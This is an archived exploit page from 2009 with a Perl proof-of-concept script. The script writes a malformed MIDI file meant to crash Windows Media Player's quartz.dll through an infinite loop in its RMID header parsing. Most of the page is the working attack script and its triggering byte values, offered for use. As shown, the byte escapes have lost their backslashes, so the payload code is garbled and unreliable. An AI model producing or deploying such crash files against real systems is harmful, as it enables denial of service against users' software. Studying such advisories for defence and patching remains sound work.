Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Media Player (quartz.dll .mid) Denial of Service Exploit
# Published : 2009-04-17
# Author : Code Audit Labs
# Previous Title : Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
# Next Title : Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC

#! /usr/bin/perl
# CAL_quartz_mid_poc.pl
#
# MircoSoft_Media_player_quartz.dll_mid_remote_Dos POC
# by Code Audit Labs public 2009-04-17
# http://www.vulnhunt.com/
#
#Affected
#========
#test on full updated winxp sp3
#windows media Player 10.00.00.3998 quartz.dll 6.5.3790.4283
#Windows Media Player 11.0.5721.5230 quartz.dll 6.5.2600.5596

#other version should be affected

# CVE: please assign to this a CVE id 
#
#ANALYSIS
#========
#  one vulnerability exists within the quartz.dll code processing RMID header
#the struct have following
#{
#  char riff_id[4]; //'RIFF'
#  DWORD rmid_size;
#  char rmid_id[4]; //'RMID'
#  char data_id[4]; //no eq data
#  DWORD midi_size; 
#}
#if  data_id is not 'data' , and midi_size is 0xfffffff8.
#the code would fall into infinity loop.

#

open(Fin, ">poc.mid") || die "can't create crash sample.$!";
binmode(Fin);
$data =  
"x52x49x46x46xffxffx00x00x52x4dx49x44x64x64x64x64" .
"xf8xffxffxffx4dx54x68x64xffxffxffxffxf8xffxffxf8" .
"xf8xffxffxffxf7xffxffxffxffxffxffxffxffxffxffxff" .
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff" .
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff";

print Fin $data;

close(Fin);

# www.Syue.com [2009-04-17]